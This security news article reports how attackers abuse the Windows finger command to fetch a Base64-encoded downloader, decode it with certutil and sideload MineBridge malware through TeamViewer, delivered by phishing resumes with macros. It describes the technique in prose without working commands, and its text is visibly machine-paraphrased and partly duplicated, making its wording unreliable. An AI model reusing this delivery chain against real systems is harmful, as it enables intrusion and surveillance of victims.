Hackers are utilizing the typically innocuous Windows 10 Finger command to download and install vindictive indirect access on casualties’ gadgets.
The ‘Finger’ command is a feature that began in Linux/Unix operating systems that permits a nearby or local client to recover a rundown of clients on any remote machine or data about a specific distant client. Notwithstanding Linux, Windows incorporates a finger.exe order that plays out similar usefulness.
To carry out the Windows 10 Finger command, the client user will need to enter
finger [user]@[remote_host].
For instance:
finger [email protected].
In September, we announced that security specialists found an approach to utilize Finger as a LoLBin to download malware from any remote PC or exfiltrate information. LolBins are genuine projects that can help assailants sidestep security controls to get malware without setting off a security alert on the framework.
The Windows 10 Finger command utilized in an active malware crusade
Later in the week, security scientist Kirk Sayre found a phishing effort using the Finger campaign to download the MineBridge indirect access malware.
Also read,
As of initially provided details by FireEye regarding the MineBridge malware in the wake of finding various phishing efforts focusing on South Korean associations. These phishing emails contain noxious Word records masked as resumes of job applicants that install the MineBridge malware.
Like the past MineBridge crusades seen by FireEye, the one found by Sayre additionally professes to be a resume from a work candidate.
When a victim clicks on the ‘Enabled Editing’ or ‘Enable Content’ buttons, a password protected macro will be executed to download the MineBridge malware and run it.
At the point when casualty taps on the ‘Empowered Editing’ or ‘Empower Content’ fastens, a secret word ensured macro will be executed to download the MineBridge malware and run it.
The deobfuscated command gets executed by the macro. It uses the Finger Command to download a Base64 encoded certificate from a remote server to save it as %AppData%\vUCooUr.
The certificate retrieved through the Finger Command on windows is a Base64 encoded malware downloader malware executable. This certificate is decoded using the certutil.exe command, saved as %AppData%\vUCooUr.exe, and then executed.
Once executed, the downloader will download a TeamViewer executable and use DLL hijacking to sideload a malicious DLL, the MineBridge malware.
The hacker will gain complete authorization to the computer once MineBridge is loaded and will permit them to listen in through the corrupted system’s microphone and carry out other dangerous operations.
FireEye, giving further explanations, comment that the two C2 methods collaborative support commands for downloading arbitrary files, self-deletion, and updating, process listing, shutting down and rebooting the system, downloading and executing payloads, executing arbitrary shell commands, process elevation, turning on/off TeamViewer’s microphone, and gathering system UAC information as well.
